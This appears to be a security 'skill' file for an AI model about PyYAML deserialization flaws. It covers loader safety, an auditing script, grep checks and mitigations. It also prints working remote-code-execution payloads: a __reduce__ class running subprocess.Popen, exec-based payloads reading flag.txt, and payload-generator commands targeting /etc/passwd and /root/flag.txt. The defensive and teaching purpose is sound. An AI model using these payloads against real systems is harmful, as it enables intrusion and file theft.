Hacktricks-skills python-yaml-deserialization
Security skill for understanding, testing, and mitigating Python YAML deserialization vulnerabilities. Use this skill whenever the user mentions YAML deserialization, PyYAML security, Python RCE through YAML, deserialization attacks, or needs to audit code for unsafe yaml.load() usage. Also trigger for requests about safe YAML loading practices, payload generation for authorized security testing, or explaining how !!python/object tags work.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/pentesting-web/deserialization/python-yaml-deserialization/SKILL.MD
Python YAML Deserialization Security
This skill helps you understand, test, and mitigate YAML deserialization vulnerabilities in Python applications. Use this for authorized security testing only.
Understanding the Vulnerability
PyYAML can deserialize Python objects, not just raw data. This becomes dangerous when untrusted input is deserialized with unsafe loaders.
How Serialization Works
    import yaml

    # Plain data is dumped as a plain scalar
    print(yaml.dump(str("lol")))
    # Output: lol

    # Python-specific objects are dumped with !!python/ tags
    print(yaml.dump(tuple("lol")))
    # Output:
    # !!python/tuple
    # - l
    # - o
    # - l

    print(yaml.dump(range(1, 10)))
    # Output:
    # !!python/object/apply:builtins.range
    # - 1
    # - 10
    # - 1

The !!python/ tags mark Python-specific objects. Tags such as !!python/object/apply name a callable that an unsafe loader invokes while deserializing, which is what makes arbitrary code execution possible.
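The tags themselves can be inspected without running anything. The following is a minimal sketch, assuming PyYAML is installed: yaml.compose() builds the node graph but does not construct Python objects, so it can list !!python/ tags before any loader sees the document. The helper name find_python_tags is hypothetical and not part of PyYAML.

```python
import yaml

PYTHON_TAG_PREFIX = "tag:yaml.org,2002:python/"  # resolved form of the !!python/ shorthand


def find_python_tags(text):
    """Return the python-specific tags in a single YAML document without constructing objects."""
    root = yaml.compose(text, Loader=yaml.SafeLoader)
    found, seen, stack = [], set(), [root]
    while stack:
        node = stack.pop()
        if node is None or id(node) in seen:  # empty document, or alias already visited
            continue
        seen.add(id(node))
        if node.tag.startswith(PYTHON_TAG_PREFIX):
            found.append(node.tag)
        if isinstance(node, yaml.SequenceNode):
            stack.extend(node.value)
        elif isinstance(node, yaml.MappingNode):
            for key, value in node.value:
                stack.extend((key, value))
    return found


print(find_python_tags("!!python/object/apply:time.sleep [2]"))
print(find_python_tags("name: test\nvalue: 123"))
```

A non-empty result is a strong hint that the document was written for an unsafe loader.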
Safe vs Unsafe Loaders
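| Function | Loader | Safe? | Notes |
|---|---|---|---|
| yaml.safe_load(data) | SafeLoader | ✅ Yes | Only basic types |
| yaml.load(data, Loader=SafeLoader) | SafeLoader | ✅ Yes | Only basic types |
| yaml.load(data) (no Loader) | Loader (<5.1), FullLoader (5.1 to 5.4.1), none (≥6.0) | ❌ No | Warns since 5.1; raises TypeError since 6.0 |
| yaml.load(data, Loader=Loader) | Loader | ❌ No | Deserializes objects |
| yaml.load(data, Loader=UnsafeLoader) | UnsafeLoader | ❌ No | Deserializes objects |
| yaml.load(data, Loader=FullLoader) | FullLoader | ❌ No | Deserializes objects |
| yaml.unsafe_load(data) | UnsafeLoader | ❌ No | Deserializes objects |
| yaml.full_load(data) | FullLoader | ❌ No | Deserializes objects |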
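Key insight: yaml.load() without a Loader has never defaulted to SafeLoader. Before 5.1 it used the unsafe Loader; from 5.1 through 5.4.1 it emitted a YAMLLoadWarning and fell back to FullLoader; since 6.0 the Loader argument is mandatory and omitting it raises TypeError. Explicitly specifying Loader or UnsafeLoader enables arbitrary object deserialization, and FullLoader should not be used on untrusted input either.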
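The difference between loaders can be observed with a harmless probe. This is a sketch under the assumption that PyYAML 5.1 or later is installed; the probe asks the loader to call len([1, 2, 3]) instead of anything destructive, and probe_loader is a hypothetical helper name. The FullLoader result depends on the installed version, so it is printed rather than assumed.

```python
import yaml

# Harmless stand-in for a real payload: asks the loader to call len([1, 2, 3]).
PROBE = "!!python/object/apply:builtins.len [[1, 2, 3]]"


def probe_loader(loader_cls):
    """Return 'executed' if the loader called the function, otherwise 'blocked'."""
    try:
        result = yaml.load(PROBE, Loader=loader_cls)
    except yaml.YAMLError:
        return "blocked"
    return "executed" if result == 3 else "blocked"


for name in ("SafeLoader", "FullLoader", "UnsafeLoader", "Loader"):
    loader_cls = getattr(yaml, name, None)  # FullLoader/UnsafeLoader need PyYAML 5.1+
    if loader_cls is not None:
        print(f"{name}: {probe_loader(loader_cls)}")
```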
Basic Exploits
Simple Command Execution
    import yaml
    from yaml import UnsafeLoader

    # Calls time.sleep(2) during deserialization
    data = b'!!python/object/apply:time.sleep [2]'
    yaml.load(data, Loader=UnsafeLoader)  # Sleeps for 2 seconds
RCE via Custom Payload
    import subprocess

    import yaml
    from yaml import UnsafeLoader

    class Payload:
        # yaml.dump() uses __reduce__ to decide how to serialize the object
        def __reduce__(self):
            return (subprocess.Popen, ('ls',))

    # Serialize the payload
    serialized = yaml.dump(Payload())
    print(serialized)
    # Output:
    # !!python/object/apply:subprocess.Popen
    # - ls

    # Deserialize (executes the command)
    yaml.load(serialized, Loader=UnsafeLoader)
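The same mechanism can be studied without spawning a process. In this sketch, which assumes PyYAML 5.1 or later, the hypothetical Probe class returns the built-in len from __reduce__; yaml.dump() turns that into a !!python/object/apply tag, and an unsafe loader then calls the function and returns its result rather than a Probe instance.

```python
import yaml


class Probe:
    """Hypothetical example class: __reduce__ names a callable and its arguments."""

    def __reduce__(self):
        return (len, ("abc",))  # harmless stand-in: len("abc")


text = yaml.dump(Probe())
print(text)  # begins with the tag !!python/object/apply:builtins.len

# The unsafe loader calls len("abc") while constructing the document.
result = yaml.load(text, Loader=yaml.UnsafeLoader)
print(result)
```

Swapping len for subprocess.Popen is the only difference between this probe and the payload above, which is why the loader choice matters more than the payload content.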
Legacy Exploit (Old PyYAML Versions)
For PyYAML <5.1, where yaml.load() without a Loader was vulnerable:

    !!python/object/new:str
    state: !!python/tuple
    - 'print(getattr(open("flag.txt"), "read")())'
    - !!python/object/new:Warning
      state:
        update: !!python/name:exec

Or the one-liner variant:

    !!python/object/new:str { state: !!python/tuple [ 'print(exec("print(open(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning { state: { update: !!python/name:exec } }, ], }
Generating Payloads
Use the generate_yaml_payload.py script (bundled with this skill) to create test payloads:

    python scripts/generate_yaml_payload.py --command "cat /etc/passwd" --output payload.yaml

Or use the external tool python-deserialization-attack-payload-generator:

    python3 peas.py
    # Enter RCE command: cat /root/flag.txt
    # Enter OS: linux
    # Select Module: PyYAML
    # Done! Check /tmp/example_yaml
Auditing Code for Vulnerabilities
Vulnerable Patterns
    from yaml import FullLoader, Loader, UnsafeLoader

    # ❌ VULNERABLE - explicit unsafe loader
    yaml.load(data, Loader=UnsafeLoader)
    yaml.load(data, Loader=Loader)
    yaml.load(data, Loader=FullLoader)

    # ❌ VULNERABLE - unsafe functions
    yaml.unsafe_load(data)
    yaml.full_load(data)

    # ❌ VULNERABLE - no Loader: unsafe Loader before 5.1,
    # FullLoader with a warning in 5.1 to 5.4.1, TypeError in 6.0+
    yaml.load(data)
Safe Patterns
    # ✅ SAFE - use safe_load
    yaml.safe_load(data)
    yaml.safe_load_all(data)

    # ✅ SAFE - explicit SafeLoader
    yaml.load(data, Loader=yaml.SafeLoader)

    # ✅ SAFE - load with safe_load, then validate the structure
    config = yaml.safe_load(raw_input)
    if not isinstance(config, dict):
        raise ValueError("expected a mapping at the top level")
Quick Audit Checklist
- Search for yaml.load( in the codebase
- Check if the Loader parameter is specified
- If Loader is UnsafeLoader, Loader, or FullLoader → VULNERABLE
- If using unsafe_load() or full_load() → VULNERABLE
- Check the PyYAML version: yaml.load() without a Loader uses the unsafe Loader before 5.1, falls back to FullLoader with a warning in 5.1 to 5.4.1, and raises TypeError in 6.0+
- Verify all YAML input is from trusted sources
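Parts of this checklist can be automated. The sketch below uses only the standard-library ast module to flag risky calls in Python source; audit_source and its messages are hypothetical names chosen for illustration. It only recognizes the literal form yaml.<function>(...), so aliased imports such as `import yaml as y` or `from yaml import load` would still need a manual search.

```python
import ast

UNSAFE_FUNCS = {"unsafe_load", "unsafe_load_all", "full_load", "full_load_all"}
SAFE_LOADERS = {"SafeLoader", "CSafeLoader"}


def _name_of(node):
    """Best-effort name of a Loader expression such as yaml.SafeLoader or SafeLoader."""
    if isinstance(node, ast.Attribute):
        return node.attr
    if isinstance(node, ast.Name):
        return node.id
    return None


def audit_source(source):
    """Return sorted (line, message) findings for risky yaml.* calls in source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Only the literal form yaml.<func>(...) is matched; aliases are missed.
        if not (isinstance(func, ast.Attribute)
                and isinstance(func.value, ast.Name)
                and func.value.id == "yaml"):
            continue
        if func.attr in UNSAFE_FUNCS:
            findings.append((node.lineno, f"yaml.{func.attr}() is not safe for untrusted input"))
        elif func.attr in ("load", "load_all"):
            loader = next((kw.value for kw in node.keywords if kw.arg == "Loader"), None)
            if loader is None and len(node.args) > 1:
                loader = node.args[1]  # Loader passed positionally
            if loader is None:
                findings.append((node.lineno, f"yaml.{func.attr}() without an explicit Loader"))
            elif _name_of(loader) not in SAFE_LOADERS:
                findings.append((node.lineno, f"yaml.{func.attr}() with a non-safe Loader"))
    return sorted(findings)


sample = """\
import yaml
a = yaml.safe_load(text)
b = yaml.load(text)
c = yaml.load(text, Loader=yaml.FullLoader)
d = yaml.unsafe_load(text)
e = yaml.load(text, Loader=yaml.SafeLoader)
"""
for line, message in audit_source(sample):
    print(f"line {line}: {message}")
```

Working on the syntax tree rather than raw text avoids false positives from comments and strings, at the cost of missing dynamically built calls.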
Mitigation Strategies
1. Always Use safe_load()
    # Replace all unsafe loading with safe_load
    data = yaml.safe_load(file_content)
2. Validate Input Source
    import yaml

    # Only deserialize full Python objects from sources you fully control
    if source == "internal_config":
        data = yaml.load(content, Loader=yaml.Loader)  # Acceptable only for trusted data
    else:
        data = yaml.safe_load(content)  # Required for untrusted data
3. Use Alternative Formats
Consider JSON for data interchange - it doesn't support object deserialization:
    import json

    # json.loads only produces dicts, lists, strings, numbers, booleans, and None
    data = json.loads(json_string)
4. Pin PyYAML Version
    # pyproject.toml
    [project]
    dependencies = ["pyyaml>=6.0"]  # 6.0+ requires an explicit Loader for yaml.load()
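A pin only helps if the deployed environment actually honors it. The following sketch, using only the standard library, reports what yaml.load(data) without a Loader does for a given PyYAML version; default_load_behavior is a hypothetical helper and the returned strings are illustrative labels, not PyYAML output.

```python
import re
from importlib import metadata


def default_load_behavior(version):
    """Describe what yaml.load(data) without a Loader does for a PyYAML version string."""
    match = re.match(r"(\d+)\.(\d+)", version)
    if match is None:
        raise ValueError(f"unrecognized version: {version!r}")
    major_minor = (int(match.group(1)), int(match.group(2)))
    if major_minor < (5, 1):
        return "unsafe Loader, no warning"
    if major_minor < (6, 0):
        return "FullLoader, with YAMLLoadWarning"
    return "TypeError: Loader is required"


try:
    installed = metadata.version("PyYAML")
    print(installed, "->", default_load_behavior(installed))
except metadata.PackageNotFoundError:
    print("PyYAML is not installed in this environment")
```

A check like this could run in CI next to the dependency pin, so a downgraded transitive dependency is noticed early.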
Testing Your Application
1. Check for Vulnerable Loaders
    grep -rn "yaml\.load" --include="*.py" .
    grep -rn "UnsafeLoader" --include="*.py" .
    grep -rn "FullLoader" --include="*.py" .
    grep -rnE "yaml\.(unsafe|full)_load" --include="*.py" .
2. Test with Payload
    # test_yaml_vuln.py
    import yaml
    from yaml import UnsafeLoader

    test_payload = b'!!python/object/apply:time.sleep [1]'

    try:
        yaml.load(test_payload, Loader=UnsafeLoader)
        print("VULNERABLE: Object deserialization enabled")
    except Exception as e:
        print(f"Safe: {e}")
3. Verify safe_load Works
    import yaml

    # This should work
    safe_data = yaml.safe_load("name: test\nvalue: 123")
    print(safe_data)  # {'name': 'test', 'value': 123}

    # This should fail
    try:
        yaml.safe_load("!!python/object/apply:time.sleep [1]")
    except Exception as e:
        print(f"Correctly blocked: {e}")
References
- Exploit-DB: YAML Deserialization Attack in Python
- Net-Square: YAML Deserialization Attack
- PyYAML Documentation
- Python Deserialization Attack Payload Generator
When to Use This Skill
Use this skill when you need to:
- Audit Python code for YAML deserialization vulnerabilities
- Generate test payloads for authorized security testing
- Understand how !!python/object tags work
- Learn safe YAML loading practices
- Explain deserialization attacks to stakeholders
- Convert vulnerable yaml.load() calls to safe alternatives
- Test applications for RCE via YAML